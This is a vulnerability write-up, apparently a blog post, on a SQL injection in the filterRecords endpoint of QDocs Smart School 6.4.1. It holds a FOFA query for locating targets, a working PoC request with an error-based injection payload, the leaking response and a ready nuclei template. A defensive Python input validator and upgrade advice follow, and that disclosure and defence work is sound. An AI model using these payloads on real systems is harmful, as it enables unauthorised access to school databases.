QDocs Smart School SQL Injection Vulnerability
Disclaimer: This article is shared as study notes for technical learning reference only; do not use it for illegal purposes. Any direct or indirect consequences or losses caused by any individual or organization using the information provided in this article are the sole responsibility of the user and have nothing to do with this platform or the publisher.
Vulnerability name
QDocs Smart School SQL Injection Vulnerability
Affected versions
Smart School 6.4.1
Vulnerability description
QDocs Smart School is a smart campus management system. The filterRecords endpoint of Smart School 6.4.1 has a SQL injection vulnerability; an attacker can obtain sensitive data from the database and potentially execute commands, which may lead to remote control of the host.
FOFA search query
body="close closebtnmodal"
Vulnerability reproduction
The PoC is as follows; the injected expression has the database compute the MD5 of 123456.
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
The response packet is as follows:
HTTP/1.1 500 Internal Server Error
Connection: close
Transfer-Encoding: chunked
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 14 Nov 2023 02:21:35 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache
Set-Cookie: ci_session=0fbd043af961fa6feb7ba1a8b5c5a3b2c0cff392; expires=Tue, 14-Nov-2023 04:21:35 GMT; Max-Age=7200; path=/; HttpOnly
Upgrade: h2,h2c
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Database Error</title>
<style type="text/css">
::selection { background-color: #E13300; color: white; }
::-moz-selection { background-color: #E13300; color: white; }
body {
background-color: #fff;
margin: 40px;
font: 13px/20px normal Helvetica, Arial, sans-serif;
color: #4F5155;
}
a {
color: #003399;
background-color: transparent;
font-weight: normal;
}
h1 {
color: #444;
background-color: transparent;
border-bottom: 1px solid #D0D0D0;
font-size: 19px;
font-weight: normal;
margin: 0 0 14px 0;
padding: 14px 15px 10px 15px;
}
code {
font-family: Consolas, Monaco, Courier New, Courier, monospace;
font-size: 12px;
background-color: #f9f9f9;
border: 1px solid #D0D0D0;
color: #002166;
display: block;
margin: 14px 0 14px 0;
padding: 12px 10px 12px 10px;
}
#container {
margin: 10px;
border: 1px solid #D0D0D0;
box-shadow: 0 0 8px #D0D0D0;
}
p {
margin: 12px 15px 12px 15px;
}
</style>
</head>
<body>
<div id="container">
<h1>A Database Error Occurred</h1>
<p>Error Number: 1105</p><p>XPATH syntax error: '^e10adc3949ba59abbe56e057f20f883'</p><p>SELECT `online_courses`.*, `course_category`.`category_name`
FROM `online_courses`
LEFT JOIN `course_category` ON `course_category`.`id` = `online_courses`.`category_id`
WHERE 1 = 1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))# '1'
AND `online_courses`.`front_side_visibility` = 'yes'
AND `online_courses`.`status` = 1</p><p>Filename: models/Course_model.php</p><p>Line Number: 708</p> </div>
</body>
</html>
The leading characters of the MD5 of 123456 are echoed back inside the XPATH error message, which proves the vulnerability exists.
nuclei PoC
The PoC file contents are as follows:
id: smart-school-filterRecords-sqli

info:
  name: QDocs Smart School SQL注入漏洞
  author: fgz
  severity: high
  description: 'QDocs Smart School是一套智慧校园管理系统。Smart School 6.4.1系统filterRecords接口存在sql注入漏洞,攻击者可获取数据库敏感数据,甚至执行命令,进而有可能导致主机被远控。'
  tags: 2023,smart-school,sqli
  metadata:
    max-request: 3
    fofa-query: body="close closebtnmodal"
    verified: true

http:
  - method: POST
    path:
      - "{{BaseURL}}/course/filterRecords/"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: "searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1"
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 500 && contains(body,'e10adc3949ba59abbe56e057f20f883')"
Running the PoC
nuclei.exe -t mypoc/其他/smart-school-filterRecords-sqli.yaml -u http://192.168.86.128:8990
Remediation
Upgrade to the latest version.
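The error page above also shows where the flaw sits: the searchvalue parameter is escaped and quoted ('1'), while the searchfield parameter is pasted into the WHERE clause unchanged, so a column-name slot is the injection point. As an added defensive example (not code from the QDocs Smart School project or from this article), the following Python script shows the two checks a patched handler or a request-inspection layer would apply to every searchdata[n][searchfield] value: it must be a bare SQL identifier, and it must belong to an allow-list of filterable columns. The column names in ALLOWED_FIELDS are assumed placeholders, not the project's real schema, and the request bodies it scans are constructed for the example, the first of them being the PoC body from this article.

```python
import re
from urllib.parse import parse_qsl

# Assumption: the handler only needs a fixed set of filterable columns.
# These names are placeholders for the example, not the project's real schema.
ALLOWED_FIELDS = {"title", "category_id", "status", "front_side_visibility"}

# A bare SQL identifier. Anything else (operators, parentheses, comment
# markers such as '#') means the parameter is carrying SQL, not a column name.
IDENTIFIER_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
SEARCHFIELD_KEY_RE = re.compile(r"^searchdata\[(\d+)\]\[searchfield\]$")


def extract_searchfields(body: str) -> dict:
    """Map filter index -> searchfield value from an x-www-form-urlencoded body.

    parse_qsl splits each pair on the first '=' and percent-decodes the value,
    so the '%23' in the PoC becomes '#' exactly as the database would see it.
    """
    fields = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        match = SEARCHFIELD_KEY_RE.match(key)
        if match:
            fields[int(match.group(1))] = value
    return fields


def validate_searchfields(body: str) -> list:
    """Return the reasons a request body must be rejected (empty list = clean)."""
    problems = []
    for idx, field in sorted(extract_searchfields(body).items()):
        if not IDENTIFIER_RE.match(field):
            problems.append(
                f"searchdata[{idx}][searchfield] is not a bare identifier: {field!r}"
            )
        elif field not in ALLOWED_FIELDS:
            problems.append(
                f"searchdata[{idx}][searchfield] is not a filterable column: {field!r}"
            )
    return problems


def scan_bodies(bodies) -> list:
    """Run the validator over captured request bodies; return (index, problems) per hit."""
    hits = []
    for i, body in enumerate(bodies):
        problems = validate_searchfields(body)
        if problems:
            hits.append((i, problems))
    return hits


# Constructed sample request bodies, as a request-logging middleware or WAF
# would capture them for POST /course/filterRecords/. Body 0 is the PoC
# from this article; bodies 1 and 2 are made up for the example.
SAMPLE_BODIES = [
    "searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1"
    "&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,"
    "concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1",
    "searchdata[0][title]=Course&searchdata[0][searchfield]=title"
    "&searchdata[0][searchvalue]=Math",
    "searchdata[0][title]=Status&searchdata[0][searchfield]=status"
    "&searchdata[0][searchvalue]=1&searchdata[1][title]=x"
    "&searchdata[1][searchfield]=password&searchdata[1][searchvalue]=a",
]

if __name__ == "__main__":
    for i, problems in scan_bodies(SAMPLE_BODIES):
        print(f"body {i}: REJECT")
        for problem in problems:
            print("   ", problem)
```

A patched handler would call validate_searchfields before building the query and keep binding searchvalue as a parameter; a detection pipeline would run scan_bodies over logged POST bodies for /course/filterRecords/ and alert on any hit, because a legitimate client never sends an operator or a comment marker as a column name. The allow-list matters as much as the identifier check: a syntactically valid but unexpected column name (body 2 above) is rejected too, which stops filtering on columns the endpoint was never meant to expose.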
This is an original article licensed under CC BY-NC-ND 4.0; when reposting in full, please credit 程序员小航.